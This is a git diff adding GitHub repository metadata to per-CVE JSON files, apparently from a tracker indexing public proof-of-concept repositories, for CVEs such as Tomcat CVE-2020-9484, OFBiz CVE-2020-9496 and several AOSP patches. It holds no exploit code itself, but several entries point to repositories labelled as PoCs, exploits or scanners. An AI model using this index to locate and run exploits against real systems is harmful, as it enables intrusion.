+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-9472.json b/2020/CVE-2020-9472.json
new file mode 100644
index 0000000000..5f1c3a3e15
--- /dev/null
+++ b/2020/CVE-2020-9472.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 356180975,
+ "name": "CVE-2020-9472",
+ "full_name": "john-dooe\/CVE-2020-9472",
+ "owner": {
+ "login": "john-dooe",
+ "id": 65825969,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65825969?v=4",
+ "html_url": "https:\/\/github.com\/john-dooe"
+ },
+ "html_url": "https:\/\/github.com\/john-dooe\/CVE-2020-9472",
+ "description": "CVE-2020-9472 构造文件",
+ "fork": false,
+ "created_at": "2021-04-09T07:39:31Z",
+ "updated_at": "2021-04-17T08:17:49Z",
+ "pushed_at": "2021-04-17T08:17:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-9483.json b/2020/CVE-2020-9483.json
new file mode 100644
index 0000000000..06c6bf34cf
--- /dev/null
+++ b/2020/CVE-2020-9483.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 327318338,
+ "name": "apache_skywalking",
+ "full_name": "shanika04\/apache_skywalking",
+ "owner": {
+ "login": "shanika04",
+ "id": 73774345,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73774345?v=4",
+ "html_url": "https:\/\/github.com\/shanika04"
+ },
+ "html_url": "https:\/\/github.com\/shanika04\/apache_skywalking",
+ "description": "CVE-2020-9483 OR CVE-2020-13921",
+ "fork": false,
+ "created_at": "2021-01-06T13:22:32Z",
+ "updated_at": "2021-03-22T05:21:36Z",
+ "pushed_at": "2021-01-06T13:52:44Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 387366849,
+ "name": "CVE-2020-9483",
+ "full_name": "Neko-chanQwQ\/CVE-2020-9483",
+ "owner": {
+ "login": "Neko-chanQwQ",
+ "id": 83222283,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83222283?v=4",
+ "html_url": "https:\/\/github.com\/Neko-chanQwQ"
+ },
+ "html_url": "https:\/\/github.com\/Neko-chanQwQ\/CVE-2020-9483",
+ "description": "PoC of SQL Injection vul(CVE-2020-9483,Apache SkyWalking)",
+ "fork": false,
+ "created_at": "2021-07-19T06:50:17Z",
+ "updated_at": "2024-02-27T03:53:09Z",
+ "pushed_at": "2021-07-19T07:01:19Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2020/CVE-2020-9484.json b/2020/CVE-2020-9484.json
index 4fb2da6c25..756203217a 100644
--- a/2020/CVE-2020-9484.json
+++ b/2020/CVE-2020-9484.json
@@ -239,6 +239,199 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 329004194,
+ "name": "CVE-2020-9484-Scanner",
+ "full_name": "DanQMoo\/CVE-2020-9484-Scanner",
+ "owner": {
+ "login": "DanQMoo",
+ "id": 29651956,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29651956?v=4",
+ "html_url": "https:\/\/github.com\/DanQMoo"
+ },
+ "html_url": "https:\/\/github.com\/DanQMoo\/CVE-2020-9484-Scanner",
+ "description": "A smol bash script I threw together pretty quickly to scan for vulnerable versions of the Apache Tomcat RCE. I'll give it some love when I have the time. ",
+ "fork": false,
+ "created_at": "2021-01-12T14:00:00Z",
+ "updated_at": "2022-04-17T09:09:57Z",
+ "pushed_at": "2020-06-10T07:08:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 333238894,
+ "name": "CVE-2020-9484",
+ "full_name": "AssassinUKG\/CVE-2020-9484",
+ "owner": {
+ "login": "AssassinUKG",
+ "id": 5285547,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5285547?v=4",
+ "html_url": "https:\/\/github.com\/AssassinUKG"
+ },
+ "html_url": "https:\/\/github.com\/AssassinUKG\/CVE-2020-9484",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-01-26T22:51:30Z",
+ "updated_at": "2024-03-13T14:58:32Z",
+ "pushed_at": "2021-02-10T00:01:45Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 337782636,
+ "name": "CVE-2020-9484",
+ "full_name": "VICXOR\/CVE-2020-9484",
+ "owner": {
+ "login": "VICXOR",
+ "id": 43370621,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43370621?v=4",
+ "html_url": "https:\/\/github.com\/VICXOR"
+ },
+ "html_url": "https:\/\/github.com\/VICXOR\/CVE-2020-9484",
+ "description": "POC for CVE-2020-9484",
+ "fork": false,
+ "created_at": "2021-02-10T16:27:07Z",
+ "updated_at": "2024-06-03T14:25:07Z",
+ "pushed_at": "2021-02-10T16:55:37Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apache",
+ "exploit",
+ "rce",
+ "tomcat"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 343388829,
+ "name": "CVE-2020-9484",
+ "full_name": "DXY0411\/CVE-2020-9484",
+ "owner": {
+ "login": "DXY0411",
+ "id": 42259364,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42259364?v=4",
+ "html_url": "https:\/\/github.com\/DXY0411"
+ },
+ "html_url": "https:\/\/github.com\/DXY0411\/CVE-2020-9484",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-03-01T11:16:04Z",
+ "updated_at": "2021-03-08T10:02:52Z",
+ "pushed_at": "2021-03-08T10:02:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 368539603,
+ "name": "CVE-2020-9484",
+ "full_name": "RepublicR0K\/CVE-2020-9484",
+ "owner": {
+ "login": "RepublicR0K",
+ "id": 73670332,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73670332?v=4",
+ "html_url": "https:\/\/github.com\/RepublicR0K"
+ },
+ "html_url": "https:\/\/github.com\/RepublicR0K\/CVE-2020-9484",
+ "description": "Apache Tomcat RCE (CVE-2020-9484)",
+ "fork": false,
+ "created_at": "2021-05-18T13:26:18Z",
+ "updated_at": "2024-06-25T17:12:35Z",
+ "pushed_at": "2021-05-18T13:27:11Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 458246235,
+ "name": "CVE-2020-9484",
+ "full_name": "ColdFusionX\/CVE-2020-9484",
+ "owner": {
+ "login": "ColdFusionX",
+ "id": 8522240,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8522240?v=4",
+ "html_url": "https:\/\/github.com\/ColdFusionX"
+ },
+ "html_url": "https:\/\/github.com\/ColdFusionX\/CVE-2020-9484",
+ "description": "POC - Apache Tomcat Deserialization Vulnerability (CVE-2020-9484)",
+ "fork": false,
+ "created_at": "2022-02-11T15:45:10Z",
+ "updated_at": "2024-06-03T14:10:30Z",
+ "pushed_at": "2022-02-11T18:02:52Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2020-9484",
+ "deserialization",
+ "docker",
+ "exploit",
+ "rce",
+ "serialization",
+ "tomcat"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 565892834,
"name": "CVE-2020-9484_Exploit",
diff --git a/2020/CVE-2020-9496.json b/2020/CVE-2020-9496.json
index 72a7e675db..a10cf2ad4e 100644
--- a/2020/CVE-2020-9496.json
+++ b/2020/CVE-2020-9496.json
@@ -29,6 +29,186 @@
"score": 0,
"subscribers_count": 2
},
+ {
+ "id": 353653665,
+ "name": "apache-ofbiz-CVE-2020-9496",
+ "full_name": "Vulnmachines\/apache-ofbiz-CVE-2020-9496",
+ "owner": {
+ "login": "Vulnmachines",
+ "id": 79006904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4",
+ "html_url": "https:\/\/github.com\/Vulnmachines"
+ },
+ "html_url": "https:\/\/github.com\/Vulnmachines\/apache-ofbiz-CVE-2020-9496",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-04-01T09:58:23Z",
+ "updated_at": "2023-09-28T11:26:22Z",
+ "pushed_at": "2021-06-10T17:25:51Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 363054000,
+ "name": "CVE-2020-9496",
+ "full_name": "g33xter\/CVE-2020-9496",
+ "owner": {
+ "login": "g33xter",
+ "id": 8503135,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8503135?v=4",
+ "html_url": "https:\/\/github.com\/g33xter"
+ },
+ "html_url": "https:\/\/github.com\/g33xter\/CVE-2020-9496",
+ "description": "Apache OFBiz unsafe deserialization of XMLRPC arguments",
+ "fork": false,
+ "created_at": "2021-04-30T06:55:32Z",
+ "updated_at": "2024-02-20T12:01:32Z",
+ "pushed_at": "2021-04-30T08:00:38Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 365298270,
+ "name": "CVE-2020-9496",
+ "full_name": "cyber-niz\/CVE-2020-9496",
+ "owner": {
+ "login": "cyber-niz",
+ "id": 25560738,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25560738?v=4",
+ "html_url": "https:\/\/github.com\/cyber-niz"
+ },
+ "html_url": "https:\/\/github.com\/cyber-niz\/CVE-2020-9496",
+ "description": "CVE-2020-9496 manual exploit",
+ "fork": false,
+ "created_at": "2021-05-07T16:50:23Z",
+ "updated_at": "2021-05-07T17:43:18Z",
+ "pushed_at": "2021-05-07T17:43:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 367057442,
+ "name": "ofbiz-poc",
+ "full_name": "yuaneuro\/ofbiz-poc",
+ "owner": {
+ "login": "yuaneuro",
+ "id": 42265015,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42265015?v=4",
+ "html_url": "https:\/\/github.com\/yuaneuro"
+ },
+ "html_url": "https:\/\/github.com\/yuaneuro\/ofbiz-poc",
+ "description": "CVE-2020-9496和CVE-2021-26295利用dnslog批量验证漏洞poc及exp",
+ "fork": false,
+ "created_at": "2021-05-13T13:28:15Z",
+ "updated_at": "2023-09-28T11:27:38Z",
+ "pushed_at": "2021-05-13T13:53:50Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 374331501,
+ "name": "CVE-2020-9496",
+ "full_name": "ambalabanov\/CVE-2020-9496",
+ "owner": {
+ "login": "ambalabanov",
+ "id": 26865210,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26865210?v=4",
+ "html_url": "https:\/\/github.com\/ambalabanov"
+ },
+ "html_url": "https:\/\/github.com\/ambalabanov\/CVE-2020-9496",
+ "description": "XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03",
+ "fork": false,
+ "created_at": "2021-06-06T10:32:07Z",
+ "updated_at": "2021-06-06T13:53:59Z",
+ "pushed_at": "2021-06-06T13:53:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 392581141,
+ "name": "CVE-2020-9496",
+ "full_name": "s4dbrd\/CVE-2020-9496",
+ "owner": {
+ "login": "s4dbrd",
+ "id": 79448708,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79448708?v=4",
+ "html_url": "https:\/\/github.com\/s4dbrd"
+ },
+ "html_url": "https:\/\/github.com\/s4dbrd\/CVE-2020-9496",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-08-04T06:48:31Z",
+ "updated_at": "2022-06-18T16:23:06Z",
+ "pushed_at": "2021-08-04T06:49:21Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 525091869,
"name": "CVE-2020-9496",
diff --git a/2020/CVE-2020-9715.json b/2020/CVE-2020-9715.json
index 856136bfd7..ed984b1aba 100644
--- a/2020/CVE-2020-9715.json
+++ b/2020/CVE-2020-9715.json
@@ -1,4 +1,34 @@
[
+ {
+ "id": 446336808,
+ "name": "CVE-2020-9715",
+ "full_name": "lsw29475\/CVE-2020-9715",
+ "owner": {
+ "login": "lsw29475",
+ "id": 13043359,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13043359?v=4",
+ "html_url": "https:\/\/github.com\/lsw29475"
+ },
+ "html_url": "https:\/\/github.com\/lsw29475\/CVE-2020-9715",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-10T08:23:05Z",
+ "updated_at": "2023-02-17T00:28:53Z",
+ "pushed_at": "2022-01-26T07:12:05Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ },
{
"id": 530258491,
"name": "CVE-2020-9715",
diff --git a/2020/CVE-2020-9922.json b/2020/CVE-2020-9922.json
new file mode 100644
index 0000000000..53c48020d4
--- /dev/null
+++ b/2020/CVE-2020-9922.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 354064477,
+ "name": "Fix-Apple-Mail-CVE-2020-9922",
+ "full_name": "Wowfunhappy\/Fix-Apple-Mail-CVE-2020-9922",
+ "owner": {
+ "login": "Wowfunhappy",
+ "id": 4484096,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4484096?v=4",
+ "html_url": "https:\/\/github.com\/Wowfunhappy"
+ },
+ "html_url": "https:\/\/github.com\/Wowfunhappy\/Fix-Apple-Mail-CVE-2020-9922",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-04-02T15:51:03Z",
+ "updated_at": "2022-02-17T01:38:37Z",
+ "pushed_at": "2021-08-09T01:01:54Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0302.json b/2021/CVE-2021-0302.json
new file mode 100644
index 0000000000..59d3a8c65d
--- /dev/null
+++ b/2021/CVE-2021-0302.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 494348960,
+ "name": "packages_apps_PackageInstaller_AOSP10_r33_CVE-2021-0302",
+ "full_name": "ShaikUsaf\/packages_apps_PackageInstaller_AOSP10_r33_CVE-2021-0302",
+ "owner": {
+ "login": "ShaikUsaf",
+ "id": 100413972,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4",
+ "html_url": "https:\/\/github.com\/ShaikUsaf"
+ },
+ "html_url": "https:\/\/github.com\/ShaikUsaf\/packages_apps_PackageInstaller_AOSP10_r33_CVE-2021-0302",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-05-20T06:33:47Z",
+ "updated_at": "2022-05-20T06:41:39Z",
+ "pushed_at": "2022-05-20T06:42:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0306.json b/2021/CVE-2021-0306.json
new file mode 100644
index 0000000000..40b64ed3da
--- /dev/null
+++ b/2021/CVE-2021-0306.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 484710924,
+ "name": "framework_base_AOSP10_r33_CVE-2021-0306_CVE-2021-0317",
+ "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2021-0306_CVE-2021-0317",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2021-0306_CVE-2021-0317",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-23T10:05:37Z",
+ "updated_at": "2022-04-23T10:29:35Z",
+ "pushed_at": "2022-04-23T10:29:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0308.json b/2021/CVE-2021-0308.json
new file mode 100644
index 0000000000..294168e017
--- /dev/null
+++ b/2021/CVE-2021-0308.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 496115451,
+ "name": "platform_external_gptfdisk_AOSP10_r33_CVE-2021-0308",
+ "full_name": "Trinadh465\/platform_external_gptfdisk_AOSP10_r33_CVE-2021-0308",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/platform_external_gptfdisk_AOSP10_r33_CVE-2021-0308",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-05-25T06:50:30Z",
+ "updated_at": "2022-05-25T06:57:38Z",
+ "pushed_at": "2022-05-25T06:58:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0313.json b/2021/CVE-2021-0313.json
new file mode 100644
index 0000000000..4231f30d1c
--- /dev/null
+++ b/2021/CVE-2021-0313.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 486862367,
+ "name": "frameworks_minikin_AOSP10_r33_CVE-2021-0313",
+ "full_name": "Satheesh575555\/frameworks_minikin_AOSP10_r33_CVE-2021-0313",
+ "owner": {
+ "login": "Satheesh575555",
+ "id": 102573923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4",
+ "html_url": "https:\/\/github.com\/Satheesh575555"
+ },
+ "html_url": "https:\/\/github.com\/Satheesh575555\/frameworks_minikin_AOSP10_r33_CVE-2021-0313",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-29T06:30:27Z",
+ "updated_at": "2022-04-29T06:32:35Z",
+ "pushed_at": "2022-04-29T06:32:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0314.json b/2021/CVE-2021-0314.json
new file mode 100644
index 0000000000..64b3ee4336
--- /dev/null
+++ b/2021/CVE-2021-0314.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 480331860,
+ "name": "framework_base_AOSP10_r33_CVE-2021-0314",
+ "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2021-0314",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2021-0314",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-11T10:29:13Z",
+ "updated_at": "2022-04-11T10:38:39Z",
+ "pushed_at": "2022-04-11T10:38:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0315.json b/2021/CVE-2021-0315.json
new file mode 100644
index 0000000000..375aac2773
--- /dev/null
+++ b/2021/CVE-2021-0315.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 485741223,
+ "name": "framework_base_AOSP10_r33_CVE-2021-0315",
+ "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2021-0315",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2021-0315",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-26T10:38:35Z",
+ "updated_at": "2022-04-26T11:02:43Z",
+ "pushed_at": "2022-04-26T11:44:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 485782626,
+ "name": "frameworks_base_Aosp10_r33_CVE-2021-0315",
+ "full_name": "pazhanivel07\/frameworks_base_Aosp10_r33_CVE-2021-0315",
+ "owner": {
+ "login": "pazhanivel07",
+ "id": 97434034,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4",
+ "html_url": "https:\/\/github.com\/pazhanivel07"
+ },
+ "html_url": "https:\/\/github.com\/pazhanivel07\/frameworks_base_Aosp10_r33_CVE-2021-0315",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-26T12:46:33Z",
+ "updated_at": "2023-03-27T01:47:17Z",
+ "pushed_at": "2022-04-26T13:07:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 486051891,
+ "name": "frameworks_base1_CVE-2021-0315",
+ "full_name": "nanopathi\/frameworks_base1_CVE-2021-0315",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/frameworks_base1_CVE-2021-0315",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-27T05:01:30Z",
+ "updated_at": "2022-04-27T05:22:34Z",
+ "pushed_at": "2023-09-21T09:44:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0316.json b/2021/CVE-2021-0316.json
new file mode 100644
index 0000000000..13b51e4159
--- /dev/null
+++ b/2021/CVE-2021-0316.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 481215106,
+ "name": "system_bt_AOSP_10_r33_CVE-2021-0316",
+ "full_name": "Satheesh575555\/system_bt_AOSP_10_r33_CVE-2021-0316",
+ "owner": {
+ "login": "Satheesh575555",
+ "id": 102573923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4",
+ "html_url": "https:\/\/github.com\/Satheesh575555"
+ },
+ "html_url": "https:\/\/github.com\/Satheesh575555\/system_bt_AOSP_10_r33_CVE-2021-0316",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-13T12:51:46Z",
+ "updated_at": "2023-08-29T15:54:45Z",
+ "pushed_at": "2022-04-13T12:54:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0318.json b/2021/CVE-2021-0318.json
new file mode 100644
index 0000000000..5e0b474316
--- /dev/null
+++ b/2021/CVE-2021-0318.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 484744433,
+ "name": "frameworks_native_AOSP10_r33_CVE-2021-0318",
+ "full_name": "nanopathi\/frameworks_native_AOSP10_r33_CVE-2021-0318",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/frameworks_native_AOSP10_r33_CVE-2021-0318",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-23T12:43:31Z",
+ "updated_at": "2022-04-23T12:48:06Z",
+ "pushed_at": "2022-04-23T12:48:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
